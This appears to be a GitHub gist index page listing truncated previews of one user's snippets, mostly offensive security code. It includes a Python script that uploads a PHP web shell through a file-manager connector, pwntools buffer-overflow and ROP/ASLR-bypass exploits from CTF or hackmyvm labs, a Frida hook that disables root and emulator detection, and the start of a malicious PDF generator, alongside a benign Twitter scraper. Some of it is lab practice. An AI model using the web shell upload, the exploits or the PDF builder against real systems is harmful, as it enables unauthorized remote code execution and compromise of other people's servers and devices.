sharpicx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import random | |
| import string | |
| def upload_txt_file(file_name): | |
| file_data = "<?=`$_POST[0]`?>" | |
| upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php" | |
| files = {"upload[]": (file_name, file_data, "application/x-httpd-php")} | |
| data = {"cmd": "upload", "target": "l1_Lw"} | |
| response = requests.post(upload_uri, files=files, data=data) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from twikit import Client | |
| import json | |
| import pandas as pd | |
| import itertools | |
| USERNAME = 'username here' | |
| EMAIL = 'email here' | |
| PASSWORD = 'password here' | |
| client = Client('en-US') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /erp/admin/security_file.php HTTP/1.1 | |
| Host: 10.1.2.120 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Referer: http://10.1.2.120/erp/admin/security_file.php | |
| Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73 | |
| DNT: 1 | |
| Connection: close |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(arch='amd64', os='linux', log_level='DEBUG') | |
| e = ELF('./pubg') | |
| p = e.process() | |
| offset = 96 | |
| p.recvuntil(b"coordinate: ") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(arch='amd64', os='linux', log_level='debug') | |
| e = ELF('./pwnme', checksec=True) | |
| p = e.process() | |
| offset = 268 | |
| p.sendline(("A" * offset) + "\xef\xbe\xad\xde") | |
| p.interactive() | |
| p.close() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Java.perform(function () { | |
| var _class = Java.use("com.xxxxxx.xxxxxxxx.MainActivity"); | |
| var _class2 = Java.use("b.b.a.a.a"); | |
| var _isEmulator = _class.isEmulator; | |
| var _root = _class2.l; | |
| _isEmulator.implementation = function () { | |
| return false; | |
| }; | |
| _root.implementation = function () { | |
| return false; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| int main() { | |
| srand(1); | |
| int var_18h = rand(); | |
| uint32_t var_14h = 0xdeadbeef; | |
| uint32_t total = var_14h ^ var_18h; | |
| printf("%d\n", total); |
sharpicx
/ exploit.py
Last active
February 4, 2024 19:40
hackmyvm - minimal (x64 bypassing ASLR + ROP chain)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(log_level="DEBUG", os="linux", arch="amd64") | |
| e = ELF("./shop") | |
| p = process(e.path) | |
| r = ROP(e) | |
| libc = ELF("/usr/lib/libc.so.6") | |
| offset = 120 | |
| padding = b"A" * offset |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Si(e) { | |
| return "0123456789abcdefghijklmnopqrstuvwxyz".charAt(e); | |
| } | |
| function Pi(e, t) { | |
| return e & t; | |
| } | |
| function Ei(e, t) { | |
| return e | t; | |
| } | |
| function Ni(e, t) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import io | |
| import bz2 | |
| import base64 | |
| import sys | |
| if sys.version_info[0] < 3: | |
| raise SystemExit("Use Python 3 (or higher) only") | |
| def create_malpdf1(filename): | |
| with open(filename, "w") as file: |